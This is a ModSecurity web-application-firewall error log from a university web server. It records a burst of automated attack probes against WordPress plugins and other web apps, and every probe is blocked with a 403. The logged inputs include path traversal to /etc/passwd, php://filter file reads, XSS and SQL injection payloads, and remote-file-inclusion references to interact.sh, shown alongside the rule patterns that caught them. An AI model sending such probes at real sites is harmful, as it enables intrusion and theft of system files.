[Tue Aug 29 11:53:28.914090 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php"] [unique_id "ZO15yMCo-f0AAAowNpkAAAAH"]
[Tue Aug 29 11:53:28.943993 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:module: 'onm<a>ouseover=alert(document.domain)'\\x22tabindex=1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/module/"] [unique_id "ZO15yMCo-f0AAAoW7QkAAAAJ"]
[Tue Aug 29 11:53:29.263068 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x95\\x5c\\x8e\\xa6 found within ARGS:command: \\x95\\x5c\\x8e\\xa6"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/Solar_History.php"] [unique_id "ZO15ycCo-f0AAAowNpoAAAAH"]
[Tue Aug 29 11:53:30.605087 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchinput. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe2\\x80\\x9c/>< found within ARGS:searchinput: \\xe2\\x80\\x9c/><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/search-locker-details.php"] [unique_id "ZO15ysCo-f0AAAni-FMAAAAU"]
[Tue Aug 29 11:53:31.266956 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15y8Co-f0AAAnHQsAAAAAT"]
[Tue Aug 29 11:53:33.898801 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout_settings_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout_settings_id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/page-layout-builder/includes/layout-settings.php"] [unique_id "ZO15zcCo-f0AAAnHQsUAAAAT"]
[Tue Aug 29 11:53:35.303784 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expertise. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:expertise: Heart' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/patient/search_result.php"] [unique_id "ZO15z8Co-f0AAAoqbUMAAAAj"]
[Tue Aug 29 11:53:35.872850 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15z8Co-f0AAAoLfVYAAAAG"]
[Tue Aug 29 11:53:37.789999 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:yuzo_related_post_css_and_style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:yuzo_related_post_css_and_style: </style><script>alert(0);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO150cCo-f0AAAoUJcsAAAAB"]
[Tue Aug 29 11:53:38.625453 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO150sCo-f0AAAoqbUkAAAAj"]
[Tue Aug 29 11:53:41.901164 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:tag: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151cCo-f0AAApHRU8AAAAP"]
[Tue Aug 29 11:53:42.680802 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:itemid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:itemid: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php"] [unique_id "ZO151sCo-f0AAAoesQkAAAAV"]
[Tue Aug 29 11:53:42.907398 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:theme_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:theme_id: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151sCo-f0AAAfWOZcAAAAL"]
[Tue Aug 29 11:53:43.713042 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:gallery_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:gallery_id: 1\\x22 onmouseover=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1518Co-f0AAApJDS0AAAAY"]
[Tue Aug 29 11:53:43.747572 2023] [:error] [pid 2634] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:toast. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:toast: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1518Co-f0AAApKaxAAAAAZ"]
[Tue Aug 29 11:53:45.544410 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:?script:setdb('snmp','syscontact'). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:?script:setdb('snmp','syscontact'): \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/config/pw_snmp_done.html"] [unique_id "ZO152cCo-f0AAAoUJdQAAAAB"]
[Tue Aug 29 11:53:45.557173 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/novius-os/admin/nos/login"] [unique_id "ZO152cCo-f0AAAoLfW0AAAAG"]
[Tue Aug 29 11:53:45.629812 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/alert-before-your-post/trunk/post_alert.php"] [unique_id "ZO152cCo-f0AAAoW7UIAAAAJ"]
[Tue Aug 29 11:53:46.837460 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php"] [unique_id "ZO152sCo-f0AAAoqbVsAAAAj"]
[Tue Aug 29 11:53:48.176486 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:return_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:return_url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO153MCo-f0AAAn4094AAAAW"]
[Tue Aug 29 11:53:50.937035 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php"] [unique_id "ZO153sCo-f0AAAolKa0AAAAe"]
[Tue Aug 29 11:53:51.713325 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index_en.php"] [unique_id "ZO1538Co-f0AAApOdbcAAAAL"]
[Tue Aug 29 11:53:52.896158 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:artname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:artname: <img src=1 onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/product.php"] [unique_id "ZO154MCo-f0AAAoUJeEAAAAB"]
[Tue Aug 29 11:53:52.974616 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO154MCo-f0AAApHRWwAAAAP"]
[Tue Aug 29 11:53:53.063256 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:callback: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/client/manage/ourphp_tz.php"] [unique_id "ZO154cCo-f0AAAoZ6UgAAAAK"]
[Tue Aug 29 11:53:53.591708 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/api.php"] [unique_id "ZO154cCo-f0AAAox7LsAAAAN"]
[Tue Aug 29 11:53:54.559656 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/webadmin/authportal/bounce.php"] [unique_id "ZO154sCo-f0AAAofm-IAAAAX"]
[Tue Aug 29 11:53:55.721164 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:text: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/new-year-firework/firework/index.php"] [unique_id "ZO1548Co-f0AAAoqbXsAAAAj"]
[Tue Aug 29 11:53:56.551391 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mod: list</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cms/info.php"] [unique_id "ZO155MCo-f0AAApHRXYAAAAP"]
